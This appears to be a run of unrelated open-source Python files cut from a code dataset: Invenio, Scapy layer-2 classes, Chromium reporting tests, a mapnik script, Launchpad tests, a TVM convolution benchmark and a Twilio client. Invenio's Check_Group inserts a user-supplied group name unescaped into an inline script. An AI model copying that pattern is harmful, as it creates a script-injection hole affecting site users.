log.info(f'Writing sitemap file for {_section}, {_app_name}, {_page}')
filename = get_sitemap_path(_section, _app_name, _page)
with storage.open(filename, 'w') as sitemap_file:
sitemap_object = sitemaps.get((_section, amo.APPS.get(_app_name)))
if not sitemap_object:
continue
content = sitemap_object.render(app_name=_app_name, page=_page)
sitemap_file.write(content)
|
lbjay/cds-invenio
|
modules/websubmit/lib/functions/Check_Group.py
|
Python
|
gpl-2.0
| 2,200
| 0.010455
|
## This file is part of CDS Invenio.
## Copyright (C) 2002, 2003, 2004, 2005, 2006, 2007, 2008 CERN.
##
## CDS Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## CDS Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with CDS Invenio; if not, write to the Free Software Foundation, In
|
c.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
__revision__ = "$Id$"
import os
import re
from invenio.dbquery import run_sql
from invenio.websubmit_config import Inven
|
ioWebSubmitFunctionStop
def Check_Group(parameters, curdir, form, user_info=None):
"""
Check that a group exists.
Read from file "/curdir/Group"
If the group does not exist, switch to page 1, step 0
"""
#Path of file containing group
if os.path.exists("%s/%s" % (curdir,'Group')):
fp = open("%s/%s" % (curdir,'Group'),"r")
group = fp.read()
group = group.replace("/","_")
group = re.sub("[\n\r]+","",group)
res = run_sql ("""SELECT id FROM usergroup WHERE name = %s""", (group,))
if len(res) == 0:
raise InvenioWebSubmitFunctionStop("""
<SCRIPT>
document.forms[0].action="/submit";
document.forms[0].curpage.value = 1;
document.forms[0].step.value = 0;
user_must_confirm_before_leaving_page = false;
document.forms[0].submit();
alert('The given group name (%s) is invalid.');
</SCRIPT>""" % (group,))
else:
raise InvenioWebSubmitFunctionStop("""
<SCRIPT>
document.forms[0].action="/submit";
document.forms[0].curpage.value = 1;
document.forms[0].step.value = 0;
user_must_confirm_before_leaving_page = false;
document.forms[0].submit();
alert('The given group name (%s) is invalid.');
</SCRIPT>""" % (group,))
return ""
|
kisel/trex-core
|
scripts/external_libs/scapy-2.3.1/python3/scapy/layers/l2.py
|
Python
|
apache-2.0
| 17,955
| 0.017154
|
## This file is part of Scapy
## See http://www.secdev.org/projects/scapy for more informations
## Copyright (C) Philippe Biondi <phil@secdev.org>
## This program is published under a GPLv2 license
"""
Classes and functions for layer 2 protocols.
"""
import os,struct,time
from scapy.base_classes import Net
from scapy.config import conf
from scapy.packet import *
from scapy.ansmachine import *
from scapy.plist import SndRcvList
from scapy.fields import *
from scapy.sendrecv import srp,srp1
from scapy.arch import get_if_hwaddr
#################
## Tools ##
#################
class Neighbor:
def __init__(self):
self.resolvers = {}
def register_l3(self, l2, l3, resolve_method):
self.resolvers[l2,l3]=resolve_method
def resolve(self, l2inst, l3inst):
k = l2inst.__class__,l3inst.__class__
if k in self.resolvers:
return self.resolvers[k](l2inst,l3inst)
def __repr__(self):
return "\n".join("%-15s -> %-15s" % (l2.__name__, l3.__name__) for l2,l3 in self.resolvers)
conf.neighbor = Neighbor()
conf.netcache.new_cache("arp_cache", 120) # cache entries expire after 120s
@conf.commands.register
def getmacbyip(ip, chainCC=0):
"""Return MAC address corresponding to a given IP address"""
if isinstance(ip,Net):
ip = next(iter(ip))
ip = inet_ntoa(inet_aton(ip))
tmp = inet_aton(ip)
if (tmp[0] & 0xf0) == 0xe0: # mcast @
return "01:00:5e:%.2x:%.2x:%.2x" % (tmp[1]&0x7f,tmp[2],tmp[3])
iff,a,gw = conf.route.route(ip)
if ( (iff == "lo") or (ip == conf.route.get_if_bcast(iff)) ):
return "ff:ff:ff:ff:ff:ff"
if gw != "0.0.0.0":
ip = gw
mac = conf.netcache.arp_cache.get(ip)
if mac:
return mac
res = srp1(Ether(dst=ETHER_BROADCAST)/ARP(op="who-has", pdst=ip),
type=ETH_P_ARP,
iface = iff,
timeout=2,
verbose=0,
chainCC=chainCC,
nofilter=1)
if res is not None:
mac = res.payload.hwsrc
conf.netcache.arp_cache[ip] = mac
return mac
return None
### Fields
class DestMACField(MACField):
def __init__(self, name):
MACField.__init__(self, name, None)
class SourceMACField(MACField):
def __init__(self, name):
MACField.__init__(self, name, None)
class ARPSourceMACField(MACField):
def __init__(self, name):
MACField.__init__(self, name, None)
### Layers
ETHER_TYPES['802_AD'] = 0x88a8
class Ether(Packet):
name = "Ethernet"
fields_desc = [ MACField("dst","00:00:00:01:00:00"),
MACField("src","00:00:00:02:00:00"),
XShortEnumField("type", 0x9000, ETHER_TYPES) ]
def hashret(self):
return struct.pack("H",self.type)+self.payload.hashret()
def answers(self, other):
if isinstance(other,Ether):
if self.type == other.type:
return self.payload.answers(other.payload)
return 0
def
|
mysummary(self):
return self.sprintf("%src% > %dst% (%type%)")
@classmeth
|
od
def dispatch_hook(cls, _pkt=None, *args, **kargs):
if _pkt and len(_pkt) >= 14:
if struct.unpack("!H", _pkt[12:14])[0] <= 1500:
return Dot3
return cls
class Dot3(Packet):
name = "802.3"
fields_desc = [ DestMACField("dst"),
MACField("src", ETHER_ANY),
LenField("len", None, "H") ]
def extract_padding(self,s):
l = self.len
return s[:l],s[l:]
def answers(self, other):
if isinstance(other,Dot3):
return self.payload.answers(other.payload)
return 0
def mysummary(self):
return "802.3 %s > %s" % (self.src, self.dst)
@classmethod
def dispatch_hook(cls, _pkt=None, *args, **kargs):
if _pkt and len(_pkt) >= 14:
if struct.unpack("!H", _pkt[12:14])[0] > 1500:
return Ether
return cls
class LLC(Packet):
name = "LLC"
fields_desc = [ XByteField("dsap", 0x00),
XByteField("ssap", 0x00),
ByteField("ctrl", 0) ]
conf.neighbor.register_l3(Ether, LLC, lambda l2,l3: conf.neighbor.resolve(l2,l3.payload))
conf.neighbor.register_l3(Dot3, LLC, lambda l2,l3: conf.neighbor.resolve(l2,l3.payload))
class CookedLinux(Packet):
name = "cooked linux"
fields_desc = [ ShortEnumField("pkttype",0, {0: "unicast",
4:"sent-by-us"}), #XXX incomplete
XShortField("lladdrtype",512),
ShortField("lladdrlen",0),
StrFixedLenField("src","",8),
XShortEnumField("proto",0x800,ETHER_TYPES) ]
class SNAP(Packet):
name = "SNAP"
fields_desc = [ X3BytesField("OUI",0x000000),
XShortEnumField("code", 0x000, ETHER_TYPES) ]
conf.neighbor.register_l3(Dot3, SNAP, lambda l2,l3: conf.neighbor.resolve(l2,l3.payload))
class Dot1Q(Packet):
name = "802.1Q"
aliastypes = [ Ether ]
fields_desc = [ BitField("prio", 0, 3),
BitField("id", 0, 1),
BitField("vlan", 1, 12),
XShortEnumField("type", 0x0000, ETHER_TYPES) ]
def answers(self, other):
if isinstance(other,Dot1Q):
if ( (self.type == other.type) and
(self.vlan == other.vlan) ):
return self.payload.answers(other.payload)
else:
return self.payload.answers(other)
return 0
def default_payload_class(self, pay):
if self.type <= 1500:
return LLC
return conf.raw_layer
def extract_padding(self,s):
if self.type <= 1500:
return s[:self.type],s[self.type:]
return s,None
def mysummary(self):
if isinstance(self.underlayer, Ether):
return self.underlayer.sprintf("802.1q %Ether.src% > %Ether.dst% (%Dot1Q.type%) vlan %Dot1Q.vlan%")
else:
return self.sprintf("802.1q (%Dot1Q.type%) vlan %Dot1Q.vlan%")
conf.neighbor.register_l3(Ether, Dot1Q, lambda l2,l3: conf.neighbor.resolve(l2,l3.payload))
class STP(Packet):
name = "Spanning Tree Protocol"
fields_desc = [ ShortField("proto", 0),
ByteField("version", 0),
ByteField("bpdutype", 0),
ByteField("bpduflags", 0),
ShortField("rootid", 0),
MACField("rootmac", ETHER_ANY),
IntField("pathcost", 0),
ShortField("bridgeid", 0),
MACField("bridgemac", ETHER_ANY),
ShortField("portid", 0),
BCDFloatField("age", 1),
BCDFloatField("maxage", 20),
BCDFloatField("hellotime", 2),
BCDFloatField("fwddelay", 15) ]
class EAPOL(Packet):
name = "EAPOL"
fields_desc = [ ByteField("version", 1),
ByteEnumField("type", 0, ["EAP_PACKET", "START", "LOGOFF", "KEY", "ASF"]),
LenField("len", None, "H") ]
EAP_PACKET= 0
START = 1
LOGOFF = 2
KEY = 3
ASF = 4
def extract_padding(self, s):
l = self.len
return s[:l],s[l:]
def hashret(self):
#return chr(self.type)+self.payload.hashret()
return bytes([self.type])+self.payload.hashret()
def answers(self, other):
if isinstance(other,EAPOL):
if ( (self.type == self.EAP_PACKET) and
(other.type == self.EAP_PACKET) ):
return self.payload.answers(other.payload)
return 0
def mysummary(self):
return self.sprintf("EAPOL %EAPOL.type%")
class EAP(Packet):
name = "EAP"
fields_desc = [ ByteEnumField("code", 4, {1:"REQUEST",2:"RESPONSE",3:"SUCCESS",4:"FAILURE"}),
ByteField("id", 0),
ShortField("len",None),
ConditionalField(ByteEnumField("type",0, {1:"ID",4:"MD5"}), lambda pkt:pkt.
|
chromium/chromium
|
chrome/test/enterprise/e2e/connector/realtime_reporting_bce/reporting_server.py
|
Python
|
bsd-3-clause
| 1,846
| 0.003792
|
# Copyright 2021 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
from googleapiclient.discovery import build
from google.oauth2 import service_account
class RealTimeReportingServer():
SCOPES = ['https://www.googleapis.com/auth/admin.reports.audit.readonly']
USER_EMAIL = 'admin@beyondcorp.bigr.name'
def create_reports_service(self, user_email):
"""Build and returns an Admin SDK Reports service object authorized with
the service accounts that act on behalf of the given user.
Args:
user_email: The email of the user. Needs permissions to access
the Admin APIs.
Returns:
Admin SDK reports service object.
"""
localDir = os.path.dirname(os.path.abspath(__file__))
filePath = os.path.join(localDir, 'service_accoun
|
tkey.json')
credentials = service_account.Credentials.from_service_account_file(
filePath, scopes=self.SCOPES)
delegatedCreds = credentials.create_delegated(user_email)
return build('admin', 'reports_v1', credentials=delegatedCreds)
def lookupevents(self, eventName, startTime, deviceId):
containsEvent = False
reportService = self.create_reports_service(self.USER_EMAIL)
results = reportService.activities().list(
userKey='all',
applicationName='chrome'
|
,
customerId='C029rpj4z',
eventName=eventName,
startTime=startTime).execute()
activities = results.get('items', [])
for activity in activities:
for event in activity.get('events', []):
for parameter in event.get('parameters', []):
if parameter['name'] == 'DEVICE_ID' and \
parameter['value'] in deviceId:
containsEvent = True
break
return containsEvent
|
hishivshah/WorldPop
|
code/create_zanzibar_boundary_map.py
|
Python
|
mit
| 1,981
| 0.002524
|
import logging
import mapnik
import xml.etree.ElementTree as ET
import os
import subprocess
import tempfile
# Set up logging
logging.basicConfig(format="%(asctime)s|%(levelname)s|%(message)s", level=logging.INFO)
# Parameters
shpPath = "C:/Projects/BirthsAndPregnanciesMapping/data/2014-04-24/Zanzibar/Zanzibar.shp"
epsDir = "C:/Projects/BirthsAndPregnanciesMapping/results/eps"
max_img_size = 1000 # Max width or height of output image
# Create style
stroke = mapnik.Stroke()
stroke.color = mapnik.Color(0,0,0)
stroke.width = 1.0
symbolizer = mapnik.LineSymbolizer(stroke)
rule = mapnik.Rule()
rule.symbols.append(symbolizer)
style = mapnik.Style()
style.rules.append(rule)
# Create Datasource
datasource = mapnik.Shapefile(file=shpPath)
# Create layer
layer = mapnik.Layer("boundaries")
layer.datasource = datasource
layer.styles.append("boundariesStyle")
# Calculate image output size
envelope = datasource.envelope()
dLong = envelope.maxx - envelope.minx
dLat = envelope.maxy - envelope.miny
aspectRatio = dLon
|
g / dLat
if dLong > dLat:
width = max_img_size
height = int(width / aspectRatio)
elif dLat > dLong:
height = max_img_s
|
ize
width = int(aspectRatio * height)
else:
width = max_img_size
height = max_img_size
# Create map
map = mapnik.Map(width, height)
map.append_style("boundariesStyle", style)
map.layers.append(layer)
map.zoom_all()
# Output to temporary postscript file
outPsPath = os.path.join(tempfile.gettempdir(), "ZanzibarAdminBoundaries.ps")
mapnik.render_to_file(map, outPsPath)
# Convert postscript to EPS file using ghostscript
outEpsPath = os.path.join(epsDir, "ZanzibarAdminBoundaries.eps")
subprocess.call(["C:/Program Files/gs/gs9.14/bin/gswin64c",
"-dDEVICEWIDTHPOINTS=%s" % width,
"-dDEVICEHEIGHTPOINTS=%s" % height,
"-sDEVICE=eps2write",
"-o",
outEpsPath,
outPsPath])
# Delete temporary file
os.remove(outPsPath)
|
abramhindle/UnnaturalCodeFork
|
python/testdata/launchpad/lib/lp/code/browser/tests/test_sourcepackagerecipebuild.py
|
Python
|
agpl-3.0
| 11,028
| 0.000091
|
# Copyright 2010 Canonical Ltd. This software is licensed under the
# GNU Affero General Public License version 3 (see the file LICENSE).
"""Tests for the source package recipe view classes and templates."""
__metaclass__ = type
from mechanize import LinkNotFoundError
from storm.locals import Store
from testtools.matchers import StartsWith
import transaction
from zope.component import getUtility
from zope.security.interfaces import Unauthorized
from zope.security.proxy import removeSecurityProxy
from lp.buildmaster.enums import BuildStatus
from lp.registry.interfaces.person import IPersonSet
from lp.services.webapp import canonical_url
from lp.soyuz.interfaces.processor import IProcessorSet
from lp.testing import (
admin_logged_in,
ANONYMOUS,
BrowserTestCase,
login,
logout,
person_logged_in,
TestCaseWithFactory,
)
from lp.testing.layers import DatabaseFunctionalLayer
from lp.testing.pages import (
extract_text,
find_main_content,
find_tags_by_class,
setupBrowser,
setupBrowserForUser,
)
from lp.testing.sampledata import ADMIN_EMAIL
class TestCanonicalUrlForRecipeBuild(TestCaseWithFactory):
layer = DatabaseFunctionalLayer
def test_canonical_url(self):
owner = self.factory.makePerson(name='ppa-owner')
ppa = self.factory.makeArchive(owner=owner, name='ppa')
build = self.factory.makeSourcePackageRecipeBuild(archive=ppa)
self.assertThat(
canonical_url(build),
StartsWith(
'http://launchpad.dev/~ppa-owner/+archive/ppa/+recipebuild/'))
class TestSourcePackageRecipeBuild(BrowserTestCase):
"""Create some sample data for recipe tests."""
layer = DatabaseFunctionalLayer
def setUp(self):
"""Provide useful defaults."""
super(TestSourcePackageRecipeBuild, self).setUp()
self.admin = getUtility(IPersonSet).getByEmail(ADMIN_EMAIL)
self.chef = self.factory.makePerson(
displayname='Master Chef', name='chef')
self.user = self.chef
self.ppa = self.factory.makeArchive(
displayname='Secret PPA', owner=self.chef, name='ppa')
self.squirrel = self.factory.makeDistroSeries(
displayname='Secret Squirrel', name='secret', version='100.04',
distribution=self.ppa.distribution)
naked_squirrel = removeSecurityProxy(self.squirrel)
naked_squirrel.nominatedarchindep = self.squirrel.newArch(
'i386', getUtility(IProcessorSet).getByName('386'), False,
self.chef, supports_virtualized=True)
def makeRecipeBuild(self):
"""Create and return a specific recipe."""
chocolate = self.factory.makeProduct(name='chocolate')
cake_branch = self.factory.makeProductBranc
|
h(
owner=self.chef, name='cake', product=chocolate)
recipe = self.factory.makeSourcePackageRecipe(
owner=self.chef, distroseries=self.squirrel, name=u'cake_recipe',
description=u'This recipe builds a foo for disto bar, with my'
' Secret Squirrel changes.', branches=[cake_branch],
daily_build_archive
|
=self.ppa)
build = self.factory.makeSourcePackageRecipeBuild(
recipe=recipe)
return build
def test_cancel_build(self):
"""An admin can cancel a build."""
queue = self.factory.makeSourcePackageRecipeBuildJob()
build = queue.specific_job.build
transaction.commit()
build_url = canonical_url(build)
logout()
browser = self.getUserBrowser(build_url, user=self.admin)
browser.getLink('Cancel build').click()
self.assertEqual(
browser.getLink('Cancel').url,
build_url)
browser.getControl('Cancel build').click()
self.assertEqual(
browser.url,
build_url)
login(ANONYMOUS)
self.assertEqual(
BuildStatus.SUPERSEDED,
build.status)
def test_cancel_build_not_admin(self):
"""No one but an admin can cancel a build."""
queue = self.factory.makeSourcePackageRecipeBuildJob()
build = queue.specific_job.build
transaction.commit()
build_url = canonical_url(build)
logout()
browser = self.getUserBrowser(build_url, user=self.chef)
self.assertRaises(
LinkNotFoundError,
browser.getLink, 'Cancel build')
self.assertRaises(
Unauthorized,
self.getUserBrowser, build_url + '/+cancel', user=self.chef)
def test_cancel_build_wrong_state(self):
"""If the build isn't queued, you can't cancel it."""
build = self.makeRecipeBuild()
build.cancelBuild()
transaction.commit()
build_url = canonical_url(build)
logout()
browser = self.getUserBrowser(build_url, user=self.admin)
self.assertRaises(
LinkNotFoundError,
browser.getLink, 'Cancel build')
def test_rescore_build(self):
"""An admin can rescore a build."""
queue = self.factory.makeSourcePackageRecipeBuildJob()
build = queue.specific_job.build
transaction.commit()
build_url = canonical_url(build)
logout()
browser = self.getUserBrowser(build_url, user=self.admin)
browser.getLink('Rescore build').click()
self.assertEqual(
browser.getLink('Cancel').url,
build_url)
browser.getControl('Score').value = '1024'
browser.getControl('Rescore build').click()
self.assertEqual(
browser.url,
build_url)
login(ANONYMOUS)
self.assertEqual(
build.buildqueue_record.lastscore,
1024)
def test_rescore_build_invalid_score(self):
"""Build scores can only take numbers."""
queue = self.factory.makeSourcePackageRecipeBuildJob()
build = queue.specific_job.build
transaction.commit()
build_url = canonical_url(build)
logout()
browser = self.getUserBrowser(build_url, user=self.admin)
browser.getLink('Rescore build').click()
self.assertEqual(
browser.getLink('Cancel').url,
build_url)
browser.getControl('Score').value = 'tentwentyfour'
browser.getControl('Rescore build').click()
self.assertEqual(
extract_text(find_tags_by_class(browser.contents, 'message')[1]),
'Invalid integer data')
def test_rescore_build_not_admin(self):
"""No one but admin can rescore a build."""
queue = self.factory.makeSourcePackageRecipeBuildJob()
build = queue.specific_job.build
transaction.commit()
build_url = canonical_url(build)
logout()
browser = self.getUserBrowser(build_url, user=self.chef)
self.assertRaises(
LinkNotFoundError,
browser.getLink, 'Rescore build')
self.assertRaises(
Unauthorized,
self.getUserBrowser, build_url + '/+rescore', user=self.chef)
def test_rescore_build_wrong_state(self):
"""If the build isn't queued, you can't rescore it."""
build = self.makeRecipeBuild()
build.cancelBuild()
transaction.commit()
build_url = canonical_url(build)
logout()
browser = self.getUserBrowser(build_url, user=self.admin)
self.assertRaises(
LinkNotFoundError,
browser.getLink, 'Rescore build')
def test_rescore_build_wrong_state_stale_link(self):
"""Show sane error if you attempt to rescore a non-queued build.
This is the case where the user has a stale link that they click on.
"""
build = self.factory.makeSourcePackageRecipeBuild()
build.cancelBuild()
index_url = canonical_url(build)
browser = self.getViewBrowser(build, '+rescore', user=self.admin)
self.assertEqual(index_url, browser.url)
self.assertIn(
'Cannot rescore this build because it is not queued.',
browser.contents)
def test_rescore_build
|
hfp/libxsmm
|
samples/deeplearning/tvm_cnnlayer/mb1_tuned_latest.py
|
Python
|
bsd-3-clause
| 20,227
| 0.039996
|
#!/usr/bin/env python3
###############################################################################
# Copyright (c) Intel Corporation - All rights reserved. #
# This file is part of the LIBXSMM library. #
# #
# For information on the license, see the LICENSE file. #
# Further information: https://github.com/hfp/libxsmm/ #
# SPDX-License-Identifier: BSD-3-Clause #
###############################################################################
# Anand Venkat (Intel Corp.)
###############################################################################
import logging
import sys
import numpy as np
import tvm
import topi
import time
from topi.util import get_const_tuple
import math
import topi.testing
import xlwt
import argparse
import os
import ctypes
from tvm import autotvm
from tvm.autotvm.tuner import XGBTuner, GATuner, RandomTuner, GridSearchTuner
parser = argparse.ArgumentParser()
parser.add_argument("-d", nargs=1, type=str, default=["resnet3"])
args = parser.parse_args()
layer = args.d[0]
#Resnet-50 layers (excluding first layer)
_resnet_layers ={
'resnet2':[1,256,64,56,56,1,1,0],
'resnet3':[1,64,64,56,56,1,1,0],
'resnet4':[1,64,64,56,56,3,1,1],
'resnet5':[1,64,256,56,56,1,1,0],
'resnet6':[1,512,256,56,56,1,2,0],
'resnet7':[1,128,256,56,56,1,2,0],
'resnet8':[1,128,128,28,28,3,1,1],
'resnet9':[1,512,128,28,28,1,1,0],
'resnet10':[1,128,512,28,28,1,1,0],
'resnet11':[1,1024,512,28,28,1,2,0],
'resnet12':[1,256,512,28,28,1,2,0],
'resnet13':[1,256,256,14,14,3,1,1],
'resnet14':[1,1024,256,14,14,1,1,0],
'resnet15':[1,256,1024,14,14,1,1,0],
'resnet16':[1,2048,1024,14,14,1,2,0],
'resnet17':[1,512,1024,14,14,1,2,0],
'resnet18':[1,512,512,7,7,3,1,1],
'resnet19':[1,2048,512,7,7,1,1,0],
'resnet20':[1,512,2048,7,7,1,1,0]
}
'''
Convert input from NCHW format to NCHW16C format where the innermost data dimension is vectorized for AVX-512
'''
def convert_input(a_np, batch, in_channel,input_height,input_width,pad_height,pad_width,vlen,A):
to_return = np.zeros((batch, math.ceil(in_channel/vlen),input_height + 2*pad_height, input_width+ 2*pad_width,vlen),dtype = A.dtype)
for i in range(batch):
for j in range(math.ceil(in_channel/vlen)):
for k in range(input_height + 2*pad_height):
for l in range(input_width + 2*pad_width):
for m in range(vlen):
if k < pad_height or k >= input_height + pad_height or l < pad_width or l >= input_width+ pad_width or j*vlen + m >= in_channel:
to_return[i,j,k,l,m] = float(0)
else:
to_return[i,j,k,l,m] = a_np[i,j*vlen + m,k-pad_height,l-pad_width]
return to_return
'''
Convert output from NCHW format to NCHW16C format where the innermost data dimension is vectorized for AVX-512
'''
def convert_output(a_np, batch, out_channel,output_height,output_width,vlen):
to_return = np.zeros((batch, out_channel,output_height, output_width), dtype = float)
for i in range(batch):
for j in range(math.ceil(out_channel/vlen)):
for k in range(output_height):
for l in range(output_width):
for m in range(vlen):
to_return[i,j*vlen + m,k,l] = a_np[i,j,k,l,m]
return to_return
'''
Convert weights from KCRS format to KCRS16C16K format where the innermost data di
|
mension is vectorized for AVX-512
'''
def convert_weight(w_np, in_channel, out_channel, kernel_height, kernel_width, vlen,W):
to_return = np.zeros((math.ceil(out_channel/vlen), math.ceil(in_channel/vlen),kernel_height, kernel_width,vlen,vlen), dtype = W.dtype)
for i in range(math.ceil(out_channel/vlen)):
for j in range(math.ceil(in_channel/vlen)):
for k in range(kernel_height):
for l in range(
|
kernel_width):
for m in range(vlen):
for n in range(vlen):
if i*vlen + n >= out_channel or j*vlen + m >= in_channel:
to_return[i,j,k,l,m,n] =float(0)
else:
to_return[i,j,k,l,m,n] = w_np[i*vlen + n,j*vlen+ m,k,l]
return to_return
# Get the reference output tensor for correctness check
def get_ref_data(batch,out_channel,in_channel,input_height,input_width,kernel_height,kernel_width,stride_height,padding):
a_np = np.random.uniform(size=(batch,in_channel,input_height,input_width)).astype(float)
w_np = np.random.uniform(size=(out_channel,in_channel,kernel_height,kernel_width)).astype(float)
if batch == 1:
b_np = topi.testing.conv2d_nchw_python(a_np, w_np, stride_height, padding)
#b_np = topi.nn.conv2d_NCHWc(a_np, w_np,out_channel,kernel_height,stride_height,
# padding, layout="NCHWc", out_layout="NCHWc", out_dtype='float32')
if batch == 1:
return a_np, w_np, b_np
else:
return a_np, w_np
#special case for small height and width (e.g.. h = w = 7), where (h*w) becomes dimension of the brgemm (M)
def intrin_libxsmm_hxw(ofmblock,ofw,ifmblock, stride_width,ifw,rco, ifh,r,s, ifh_stride, ifw_stride,\
ofh, stride_height, out_channel,output_height, output_width, in_channel):
last_input_width_index = (ofw-1)*stride_width + s-1
last_input_height_index = (ofh-1)*stride_height + r-1
ry = tvm.reduce_axis((0, r), name='ry')
rx = tvm.reduce_axis((0, s), name='rx')
A = tvm.placeholder((rco,r,s,ifmblock, ofmblock), name='w')
B = tvm.placeholder((rco,last_input_height_index + 1,last_input_width_index + 1,ifmblock), name='b')
k = tvm.reduce_axis((0, ifmblock), name='k')
k_outer = tvm.reduce_axis((0, rco), name='k_outer')
C = tvm.compute(
(ofh,ofw,ofmblock),
lambda z,m,n: tvm.sum(A[k_outer,ry,rx,k,n] * B[k_outer,ry + z*stride_height,rx + m*stride_width,k], axis=[k_outer,ry,rx,k]),
name='out')
s1 = tvm.create_schedule(C.op)
ifw1,ofw1,ofmblock1 = s1[C].op.axis
rco_outer,ry,rx,rci = s1[C].op.reduce_axis
s1[C].reorder(ifw1,rco_outer,ry,rx,ofw1,ofmblock1,rci)
xx_ptr = tvm.decl_buffer(A.shape, A.dtype,
name="W",offset_factor = 1,
data_alignment=64)
yy_ptr = tvm.decl_buffer(B.shape, B.dtype,
name="X",offset_factor=1,\
strides=[tvm.var("s3"),tvm.var("s2"), ifmblock, 1],#offset_factor=16
data_alignment=64)
zz_ptr = tvm.decl_buffer(C.shape, C.dtype,
name="OUT",offset_factor=1,#offset_factor=1,
strides=[output_width*ofmblock, ofmblock, 1],
data_alignment=64)
def intrin_func(ins, outs):
# tvm call extern is used to interface to libxsmm bacth reduce kernel gemm implementation
# rco*r*s is the number of batches
init_and_compute = tvm.call_extern ("int32","batch_reduce_kernel_init_update", ins[0].access_ptr("r"),ins[1].access_ptr("r"),outs[0].access_ptr("w"),\
rco*r*s,ofmblock,ifmblock,r,s,ifh_stride,ifw_stride, ofw*ofh, stride_width)
reset = tvm.call_extern ("int32","batch_reduce_kernel_init", outs[0].access_ptr("w"),ofmblock, ofw*ofh)
body = tvm.call_extern ("int32","batch_reduce_kernel_update", ins[0].access_ptr("r"),ins[1].access_ptr("r"),outs[0].access_ptr("w"), rco*r*s,ofmblock,\
ifmblock,ofw*ofh, stride_width,r,s, ifh_stride,ifw_stride)
if math.ceil(in_channel/ifmblock) == rco:
return init_and_compute, None, init_and_compute
else:
return init_and_compute,reset,body
with tvm.build_config(data_alignment=64):
return tvm.decl_tensor_intrin(C.op, intrin_func, name="GEMM",
binds= {A: xx_ptr,
|
tysonholub/twilio-python
|
twilio/rest/video/v1/room/room_participant/room_participant_subscribed_track.py
|
Python
|
mit
| 15,072
| 0.003715
|
# coding=utf-8
r"""
This code was generated by
\ / _ _ _| _ _
| (_)\/(_)(_|\/| |(/_ v1.0.0
/ /
"""
from twilio.base import deserialize
from twilio.base import values
from twilio.base.instance_context import InstanceContext
from twilio.base.instance_resource import InstanceResource
from twilio.base.list_resource import ListResource
from twilio.base.page import Page
class SubscribedTrackList(ListResource):
""" """
def __init__(self, version, room_sid, participant_sid):
"""
Initialize the SubscribedTrackList
:param Version version: Version that contains the resource
:param room_sid: The SID of the room where the track is published
:param participant_sid: The SID of the participant that subscribes to the track
:returns: twilio.rest.video.v1.room.room_participant.room_participant_subscribed_track.SubscribedTrackList
:rtype: twilio.rest.video.v1.room.room_participant.room_participant_subscribed_track.SubscribedTrackList
"""
super(SubscribedTrackList, self).__init__(version)
# Path Solution
self._solution = {'room_sid': room_sid, 'participant_sid': participant_sid, }
self._uri = '/Rooms/{room_sid}/Participants/{participant_sid}/SubscribedTracks'.format(**self._solution)
def stream(self, limit=None, page_size=None):
"""
Streams SubscribedTrackInstance records from the API as a generator stream.
This operation lazily loads records as efficiently as possible until the limit
is reached.
The results are returned as a generator, so this operation is memory efficient.
:param int limit: Upper limit for the number of records to return. stream()
guarantees to never return more than limit. Default is no limit
:param int page_size: Number of records to fetch per request, when not set will use
the default value of 50 records. If no page_size is defined
but a limit is defined, stream() will attempt to read the
limit with the most efficient page size, i.e. min(limit, 1000)
:returns: Generator that will yield up to limit results
:rtype: list[twilio.rest.video.v1.room.room_participant.room_participant_subscribed_track.SubscribedTrackInstance]
"""
limits = self._version.read_limits(limit, page_size)
page = self.page(page_size=limits['page_size'], )
return self._version.stream(page, limits['limit'], limits['page_limit'])
def list(self, limit=None, page_size=None):
"""
Lists SubscribedTrackInstance records from the API as a list.
Unlike stream(), this operation is eager and will load `limit` records into
memory before returning.
:param int limit: Upper limit for the number of records to return. list() guarantees
never to return more than limit. Default is no limit
:param int page_size: Number of records to fetch per request, when not set will use
the default value of 50 records. If no page_size is defined
but a limit is defined, list() will attempt to read the limit
with the most efficient page size, i.e. min(limit, 1000)
:returns: Generator that will yield up to limit results
:rtype: list[twilio.rest.video.v1.room.room_participant.room_participant_subscribed_track.SubscribedTrackInstance]
"""
return list(self.stream(limit=limit, page_size=page_size, ))
def page(self, page_token=values.unset, page_number=values.unset,
page_size=values.unset):
"""
Retrieve a single page of SubscribedTrackInstance records from the API.
Request is executed immediately
:param str page_token: PageToken provided by the API
:param int page_number: Page Number, this value is simply for client state
:param int page_size: Number of records to return, defaults to 50
:returns: Page of SubscribedTrackInstance
:rtype: twilio.rest.video.v1.room.room_participant.room_participant_subscribed_track.SubscribedTrackPage
"""
params = values.of({'PageToken': page_token, 'Page': page_number, 'PageSize': page_size, })
response = self._version.page(
'GET',
self._uri,
params=params,
)
return SubscribedTrackPage(self._version, response, self._solution)
def get_page(self, target_url):
"""
Retrieve a specific page of SubscribedTrackInstance records from the API.
Request is executed immediately
:param str target_url: API-generated URL for the requested results page
:returns: Page of SubscribedTrackInstance
:rtype: twilio.rest.video.v1.room.room_participant.room_participant_subscribed_track.SubscribedTrackPage
"""
response = self._version.domain.twilio.request(
'GET',
target_url,
)
return SubscribedTrackPage(self._version, response, self._solution)
def get(self, sid):
"""
Constructs a SubscribedTrackContext
:param sid: The SID that identifies the resource to fetch
:returns: twilio.rest.video.v1.room.room_participant.room_participant_subscribed_track.SubscribedTrackContext
:rtype: twilio.rest.video.v1.room.room_participant.room_participant_subscribed_track.SubscribedTrackContext
"""
return SubscribedTrackContext(
self._version,
room_sid=self._solution['room_sid'],
participant_sid=self._solution['participant_sid'],
sid=sid,
)
def __call__(self, sid):
"""
Constructs a SubscribedTrackContext
:param sid: The SID that identifies the resource to fetch
:returns: twilio.rest.video.v1.room.room_participant.room_participant_subscribed_track.SubscribedTrackContext
:rtype: twilio.rest.video.v1.room.room_participant.room_participant_subscribed_track.SubscribedTrackContext
"""
return SubscribedTrackContext(
self._version,
room_sid=self._solution['room_sid'],
participant_sid=self._solution['participant_sid'],
sid=sid,
)
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
return '<Twilio.Video.V1.SubscribedTrackList>'
class SubscribedTrackPage(Page):
""" """
def __init__(self, version, response, solution):
"""
Initialize the SubscribedTrackPage
